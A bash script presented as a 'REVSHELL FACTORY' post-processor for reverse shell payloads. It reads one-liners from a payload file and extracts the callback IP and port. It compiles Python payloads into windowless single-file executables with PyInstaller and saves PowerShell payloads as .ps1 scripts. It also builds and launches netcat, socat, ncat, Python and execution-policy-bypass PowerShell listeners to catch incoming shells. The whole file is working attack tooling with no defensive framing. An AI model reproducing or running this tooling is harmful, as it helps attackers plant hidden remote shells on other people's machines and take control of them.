#!/usr/bin/env bash
# =============================================================================
# REVSHELL FACTORY – Ultimate Post‑Processor (Production Grade)
# =============================================================================
# Processes payload files generated by revshell_factory.py (or any text file
# containing reverse shell one‑liners).  Handles:
#   • Selection of payloads (by line number, ranges, 'all', or manual paste)
#   • IP / port detection from payload, conf.txt, or interactive input
#   • Extracts Python code and compiles it with PyInstaller into:
#       final_shell_compiled/
#   • Saves PowerShell payloads as .ps1 scripts
#   • Generates the appropriate listener command (netcat, socat, ncat,
#     python, powershell)
#   • Copies to clipboard (pbcopy / xclip / clip.exe)
#   • Starts listener in a new terminal window (macOS, Linux, Windows)
#   • Persists IP / port in conf.txt for reuse
#
# Usage:
#   ./revshell_postprocess.sh [<payload-file>] [--compile] [--listener-only]
#           [--conf <file>] [--store-conf] [--output-dir <dir>]
#
# Examples:
#   ./revshell_postprocess.sh payloads.txt --compile --store-conf
#   ./revshell_postprocess.sh --listener-only --conf myconf.txt
#   ./revshell_postprocess.sh <(cat payloads.txt | head -20)
# =============================================================================

set -eo pipefail

# ---------------------------------------------------------------------------
# Default values
# ---------------------------------------------------------------------------
COMPILE_DIR="final_shell_compiled"
CONF_FILE="conf.txt"
OUTPUT_DIR="."

# Command line flags
COMPILE_ALWAYS=0
LISTENER_ONLY=0
STORE_CONF=0

# ---------------------------------------------------------------------------
# Helper functions – no colours, clean output
# ---------------------------------------------------------------------------
success() { echo "[+] $*"; }
info()    { echo "[*] $*"; }
warn()    { echo "[!] $*"; }
err()     { echo "[-] $*" >&2; }
die()     { err "$*"; exit 1; }

# ---------------------------------------------------------------------------
# Show a snippet of the payload file (first 10 lines, stripped of numbers)
# ---------------------------------------------------------------------------
preview_file() {
    local f="$1"
    info "Payload file: $f"
    echo "--- First 10 entries ---"
    if [[ "$f" == *.json ]]; then
        jq -r '.[] | .command' "$f" 2>/dev/null | nl -w2 -s': ' | head -10
    elif [[ "$f" == *.md ]]; then
        grep -E '^```bash$' -A1 "$f" | grep -v '```' | nl -w2 -s': ' | head -10
    else
        nl -w2 -s': ' "$f" | head -10
    fi
    echo "------------------------"
}

# ---------------------------------------------------------------------------
# Detect listener type from a command line
# ---------------------------------------------------------------------------
detect_listener_type() {
    local cmd="$1"
    if [[ "$cmd" =~ ^(nc|ncat|netcat) ]]; then
        echo "netcat"
    elif [[ "$cmd" =~ ^socat ]]; then
        echo "socat"
    elif [[ "$cmd" =~ ^python ]]; then
        echo "python"
    elif [[ "$cmd" =~ ^powershell ]]; then
        echo "powershell"
    else
        echo "netcat"
    fi
}

# ---------------------------------------------------------------------------
# Generate a listener command for a given type and port
# ---------------------------------------------------------------------------
gen_listener_cmd() {
    local ltype="$1" port="$2"
    case "$ltype" in
        netcat)     echo "nc -lvnp $port" ;;
        socat)      echo "socat TCP-LISTEN:$port,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane" ;;
        ncat)       echo "ncat -lvnp $port --ssl" ;;
        python)     echo "python3 -c 'import socket,subprocess;s=socket.socket();s.bind((\"0.0.0.0\",$port));s.listen(1);c,a=s.accept();subprocess.run([\"/bin/sh\"],stdin=c.makefile(\"r\"),stdout=c.makefile(\"w\"))'" ;;
        powershell) echo "powershell -NoP -NonI -Exec Bypass -Command \"\$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',$port);\$listener.Start();\$client = \$listener.AcceptTcpClient();\$stream = \$client.GetStream();\$writer = New-Object System.IO.StreamWriter(\$stream);\$reader = New-Object System.IO.StreamReader(\$stream);while(\$true){ \$cmd = Read-Host; \$writer.WriteLine(\$cmd); \$writer.Flush(); \$output = \$reader.ReadToEnd(); Write-Host \$output }\"" ;;
        *)          echo "nc -lvnp $port" ;;
    esac
}

# ---------------------------------------------------------------------------
# Copy to clipboard
# ---------------------------------------------------------------------------
clip() {
    local text="$1"
    if command -v pbcopy &>/dev/null; then
        echo "$text" | pbcopy
        success "Copied to clipboard (pbcopy)"
    elif command -v xclip &>/dev/null; then
        echo "$text" | xclip -selection clipboard
        success "Copied to clipboard (xclip)"
    elif command -v clip.exe &>/dev/null; then
        echo "$text" | clip.exe
        success "Copied to clipboard (clip.exe)"
    else
        warn "Clipboard tool not found – install pbcopy/xclip/clip.exe"
    fi
}

# ---------------------------------------------------------------------------
# Start a listener in a new terminal
# ---------------------------------------------------------------------------
start_listener() {
    local cmd="$1" port="$2"
    info "Starting listener on port $port ..."
    case "$OSTYPE" in
        darwin*)
            osascript -e "tell application \"Terminal\" to do script \"$cmd\"" ;;
        linux*)
            if command -v xterm &>/dev/null; then
                xterm -e "$cmd" &
            elif command -v gnome-terminal &>/dev/null; then
                gnome-terminal -- bash -c "$cmd; exec bash" &
            else
                warn "No terminal emulator found – run manually: $cmd"
            fi ;;
        msys*|cygwin*|win32*)
            start cmd /k "$cmd" 2>/dev/null || warn "Run manually: $cmd" ;;
        *)
            warn "Unsupported OS – run manually: $cmd" ;;
    esac
}

# ---------------------------------------------------------------------------
# Conf file: load / save IP & port
# ---------------------------------------------------------------------------
load_conf() {
    if [[ -f "$CONF_FILE" ]]; then
        source "$CONF_FILE" 2>/dev/null || true
        if [[ -n "$SAVED_IP" && -n "$SAVED_PORT" ]]; then
            info "Loaded config: $SAVED_IP:$SAVED_PORT"
        fi
    fi
}

save_conf() {
    local ip="$1" port="$2"
    cat > "$CONF_FILE" <<EOF
SAVED_IP="$ip"
SAVED_PORT="$port"
EOF
    success "Config saved to $CONF_FILE"
}

# ---------------------------------------------------------------------------
# Extract IP and port from a payload string
# Returns two variables: TARGET_IP and TARGET_PORT (must be used via
# subshell? We'll use a function that sets global variables.)
# ---------------------------------------------------------------------------
extract_ip_port() {
    local cmd="$1"
    TARGET_IP=""
    TARGET_PORT=""
    # IPv4
    if [[ "$cmd" =~ ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}) ]]; then
        TARGET_IP="${BASH_REMATCH[1]}"
    # IPv6 with brackets
    elif [[ "$cmd" =~ \[([a-fA-F0-9:]+)\] ]]; then
        TARGET_IP="${BASH_REMATCH[1]}"
    # IPv6 without brackets (risky)
    elif [[ "$cmd" =~ ([a-fA-F0-9:]+) ]]; then
        TARGET_IP="${BASH_REMATCH[1]}"
    fi
    # Port: digits following something that isn't a digit, but we take the first 1‑5 digit group
    if [[ "$cmd" =~ [^0-9]([0-9]{1,5})[^0-9] ]]; then
        local p="${BASH_REMATCH[1]}"
        if (( p >= 1 && p <= 65535 )); then
            TARGET_PORT="$p"
        fi
    fi
}

# ---------------------------------------------------------------------------
# Compile a Python script with PyInstaller
# ---------------------------------------------------------------------------
compile_python_script() {
    local script="$1"
    local name
    name=$(basename "$script" .py)
    mkdir -p "$COMPILE_DIR"

    if ! command -v pyinstaller &>/dev/null; then
        warn "PyInstaller not found – attempting pip install"
        pip install pyinstaller >/dev/null 2>&1 || die "Failed to install PyInstaller"
    fi

    info "Compiling $script → $COMPILE_DIR/$name"
    pyinstaller --onefile --noconsole --name "$name" \
        --distpath "$COMPILE_DIR" --workpath /tmp/pyinstaller_work \
        --specpath /tmp/pyinstaller_spec "$script" >/dev/null 2>&1

    # Clean temporary build artifacts
    rm -rf /tmp/pyinstaller_work /tmp/pyinstaller_spec build "${name}.spec" 2>/dev/null || true

    # Check for output
    if [[ -f "$COMPILE_DIR/$name" || -f "$COMPILE_DIR/$name.exe" ]]; then
        success "Compiled: $COMPILE_DIR/$name"
    else
        err "Compilation failed for $script – check /tmp/pyinstaller.log if enabled"
    fi
}

# ---------------------------------------------------------------------------
# Main processing of a single payload command
# ---------------------------------------------------------------------------
process_payload() {
    local PAYLOAD_CMD="$1"

    echo ""
    echo "----------------------------------------------"
    info "Payload:"
    echo "$PAYLOAD_CMD"
    echo "----------------------------------------------"

    # --- Extract IP and port ---
    extract_ip_port "$PAYLOAD_CMD"

    # If not found, try config
    if [[ -z "$TARGET_IP" || -z "$TARGET_PORT" ]]; then
        load_conf
        if [[ -n "$SAVED_IP" && -n "$SAVED_PORT" ]]; then
            TARGET_IP="$SAVED_IP"
            TARGET_PORT="$SAVED_PORT"
            info "Using IP/port from config: $TARGET_IP:$TARGET_PORT"
        fi
    fi

    # Prompt if still missing
    if [[ -z "$TARGET_IP" ]]; then
        read -rp "Enter listener IP: " TARGET_IP
    fi
    if [[ -z "$TARGET_PORT" ]]; then
        read -rp "Enter listener port: " TARGET_PORT
    fi

    # Confirm
    read -rp "Listener $TARGET_IP:$TARGET_PORT – correct? (Y/n) " CONFIRM
    if [[ "$CONFIRM" =~ ^[Nn] ]]; then
        read -rp "Enter listener IP: " TARGET_IP
        read -rp "Enter listener port: " TARGET_PORT
    fi

    if [[ $STORE_CONF -eq 1 ]]; then
        save_conf "$TARGET_IP" "$TARGET_PORT"
    fi

    # --- Handle Python payloads: extract and compile ---
    if [[ "$PAYLOAD_CMD" =~ ^python3?\ -c\ [\'\"](([^\'\"]|\\[\'\"])*)[\'\"] ]]; then
        local py_code="${BASH_REMATCH[1]}"
        info "Detected Python one‑liner"

        local should_compile=$COMPILE_ALWAYS
        if [[ $COMPILE_ALWAYS -eq 0 ]]; then
            read -rp "Compile with PyInstaller? (y/N) " yn
            [[ "$yn" =~ ^[Yy] ]] && should_compile=1
        fi

        if [[ $should_compile -eq 1 ]]; then
            local tmp_py
            tmp_py=$(mktemp /tmp/payload_XXXXXX.py)
            # Write a robust script with shebang
            cat > "$tmp_py" <<EOF
#!/usr/bin/env python3
$py_code
EOF
            chmod +x "$tmp_py"
            success "Temporary Python script: $tmp_py"
            compile_python_script "$tmp_py"
            rm -f "$tmp_py"
        else
            info "Skipping compilation."
        fi
    # --- PowerShell: optionally save as .ps1 ---
    elif [[ "$PAYLOAD_CMD" =~ ^powershell ]]; then
        info "Detected PowerShell payload"
        read -rp "Save as .ps1 file? (y/N) " yn
        if [[ "$yn" =~ ^[Yy] ]]; then
            echo "$PAYLOAD_CMD" > payload.ps1
            success "Saved to payload.ps1"
        fi
    else
        info "Not a Python/PowerShell payload – skipping compilation."
    fi

    # --- Generate and display listener command ---
    local ltype
    ltype=$(detect_listener_type "$PAYLOAD_CMD")
    local listener_cmd
    listener_cmd=$(gen_listener_cmd "$ltype" "$TARGET_PORT")

    echo ""
    success "Listener command:"
    echo "    $listener_cmd"
    clip "$listener_cmd"

    if [[ $LISTENER_ONLY -eq 0 ]]; then
        read -rp "Start listener now? (y/N) " yn
        if [[ "$yn" =~ ^[Yy] ]]; then
            start_listener "$listener_cmd" "$TARGET_PORT"
        fi
    fi
}

# ---------------------------------------------------------------------------
# Argument parsing
# ---------------------------------------------------------------------------
PAYLOAD_FILE=""
while [[ $# -gt 0 ]]; do
    case "$1" in
        --compile)        COMPILE_ALWAYS=1; shift ;;
        --listener-only)  LISTENER_ONLY=1; shift ;;
        --conf)           CONF_FILE="$2"; shift 2 ;;
        --store-conf)     STORE_CONF=1; shift ;;
        --output-dir)     COMPILE_DIR="$2"; shift 2 ;;
        *)                PAYLOAD_FILE="$1"; shift ;;
    esac
done

# ---------------------------------------------------------------------------
# Listener‑only mode
# ---------------------------------------------------------------------------
if [[ $LISTENER_ONLY -eq 1 ]]; then
    load_conf
    local port="${SAVED_PORT}"
    local ip="${SAVED_IP:-0.0.0.0}"

    if [[ -z "$port" ]]; then
        read -rp "Enter port: " port
    else
        info "Port from config: $port"
        read -rp "Use this port? (Y/n) " yn
        if [[ "$yn" =~ ^[Nn] ]]; then
            read -rp "Enter port: " port
        fi
    fi

    read -rp "Listener type (netcat/socat/ncat/python/powershell) [netcat]: " ltype
    ltype="${ltype:-netcat}"
    local listener_cmd
    listener_cmd=$(gen_listener_cmd "$ltype" "$port")

    success "Listener command: $listener_cmd"
    clip "$listener_cmd"
    read -rp "Start listener? (y/N) " yn
    if [[ "$yn" =~ ^[Yy] ]]; then
        start_listener "$listener_cmd" "$port"
    fi
    [[ $STORE_CONF -eq 1 ]] && save_conf "$ip" "$port"
    exit 0
fi

# ---------------------------------------------------------------------------
# Obtain payload input
# ---------------------------------------------------------------------------
PAYLOAD_RAW=""
if [[ -n "$PAYLOAD_FILE" && -f "$PAYLOAD_FILE" ]]; then
    preview_file "$PAYLOAD_FILE"
    read -rp "Selection (line numbers e.g. 1,2-5, 'a' for all, 'm' to paste manually): " CHOICE
else
    info "No file given. Paste your payload (Ctrl+D to finish):"
    PAYLOAD_RAW=$(cat)
    CHOICE="m"
fi

# ---------------------------------------------------------------------------
# Build array of selected payloads
# ---------------------------------------------------------------------------
PAYLOAD_CMDS=()

case "$CHOICE" in
    [aA])
        # all
        if [[ "$PAYLOAD_FILE" == *.json ]]; then
            while IFS= read -r line; do PAYLOAD_CMDS+=("$line"); done < <(jq -r '.[] | .command' "$PAYLOAD_FILE")
        elif [[ "$PAYLOAD_FILE" == *.md ]]; then
            while IFS= read -r line; do PAYLOAD_CMDS+=("$line"); done < <(grep -E '^```bash$' -A1 "$PAYLOAD_FILE" | grep -v '```')
        else
            while IFS= read -r line; do line="${line#*: }"; PAYLOAD_CMDS+=("$line"); done < "$PAYLOAD_FILE"
        fi
        ;;
    [mM])
        PAYLOAD_CMDS=("$PAYLOAD_RAW")
        ;;
    *)
        # Parse ranges
        IFS=',' read -ra RANGES <<< "$CHOICE"
        for range in "${RANGES[@]}"; do
            if [[ "$range" =~ ^([0-9]+)$ ]]; then
                idx="${BASH_REMATCH[1]}"
                if [[ "$PAYLOAD_FILE" == *.json ]]; then
                    cmd=$(jq -r ".[$((idx-1))].command" "$PAYLOAD_FILE" 2>/dev/null)
                elif [[ "$PAYLOAD_FILE" == *.md ]]; then
                    cmd=$(grep -E '^```bash$' -A1 "$PAYLOAD_FILE" | grep -v '```' | sed -n "${idx}p")
                else
                    cmd=$(sed -n "${idx}p" "$PAYLOAD_FILE" | sed 's/^[0-9]*: //')
                fi
                [[ -n "$cmd" ]] && PAYLOAD_CMDS+=("$cmd")
            elif [[ "$range" =~ ^([0-9]+)-([0-9]+)$ ]]; then
                for ((i=${BASH_REMATCH[1]}; i<=${BASH_REMATCH[2]}; i++)); do
                    if [[ "$PAYLOAD_FILE" == *.json ]]; then
                        cmd=$(jq -r ".[$((i-1))].command" "$PAYLOAD_FILE" 2>/dev/null)
                    elif [[ "$PAYLOAD_FILE" == *.md ]]; then
                        cmd=$(grep -E '^```bash$' -A1 "$PAYLOAD_FILE" | grep -v '```' | sed -n "${i}p")
                    else
                        cmd=$(sed -n "${i}p" "$PAYLOAD_FILE" | sed 's/^[0-9]*: //')
                    fi
                    [[ -n "$cmd" ]] && PAYLOAD_CMDS+=("$cmd")
                done
            fi
        done
        ;;
esac

if [[ ${#PAYLOAD_CMDS[@]} -eq 0 ]]; then
    die "No payloads selected."
fi

# ---------------------------------------------------------------------------
# Process each payload
# ---------------------------------------------------------------------------
for cmd in "${PAYLOAD_CMDS[@]}"; do
    process_payload "$cmd"
done

success "All done."
